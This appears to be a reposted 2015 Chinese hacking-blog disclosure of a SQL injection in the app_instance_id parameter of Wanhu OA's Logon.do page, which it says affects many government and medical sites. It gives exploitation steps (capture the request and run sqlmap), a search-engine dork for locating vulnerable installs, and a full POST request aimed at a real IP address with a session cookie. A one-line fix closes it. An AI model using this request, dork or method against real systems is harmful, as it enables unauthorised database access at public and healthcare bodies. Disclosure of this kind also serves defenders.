记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

万户OA某页面通用性SQL注入(影响N个政府网和医疗机构)

2015-10-10 06:00

万户OA某页面通用性SQL注入(影响N个政府网和医疗机构)

defaultroot/Logon.do 该页面存在越权访问,由于app_instance_id参数过滤不严,导致了SQL注入的产生

问题参数:app_instance_id

EXP:defaultroot/Logon.do

利用方法:访问该页面,输入任意内容,抓包获取,SQLMAP跑之~~~

百度搜索到的:

https://www.baidu.com/s?wd=inurl%3Adefaultroot%2F&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=1&rsv_sug3=5&rsv_sug1=4&rsv_n=2&rsv_sug2=0&inputT=2953&rsv_sug4=2953



----------------------------------------POST----------------------------------

POST /defaultroot/Logon.do HTTP/1.1

Host: 222.74.140.54:7001

Connection: keep-alive

Content-Length: 41

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Origin: http://222.74.140.54:7001

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: application/x-www-form-urlencoded

Referer: http://222.74.140.54:7001/defaultroot/aep/login.jsp

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: LocLan=zh_cn; JSESSIONID=Gp2TVdvDF7Yf2VdJNKC8Ql62vFJLZbfXqQ3LwhZp75XfSGQb1pCn!-1516176646; ezofficeUserName=; ezofficeDomainAccount=whir



app_instance_id=11&user_id=111&userType=0



----------------------------------------POST----------------------------------
 

2.jpg




 

1.jpg




 

3.jpg

 

解决方案:

对app_instance_id参数做过滤,限制/aep/login.jsp文件的访问权限。

知识来源: www.2cto.com/Article/201510/444955.html

阅读:143227 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“万户OA某页面通用性SQL注入(影响N个政府网和医疗机构)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云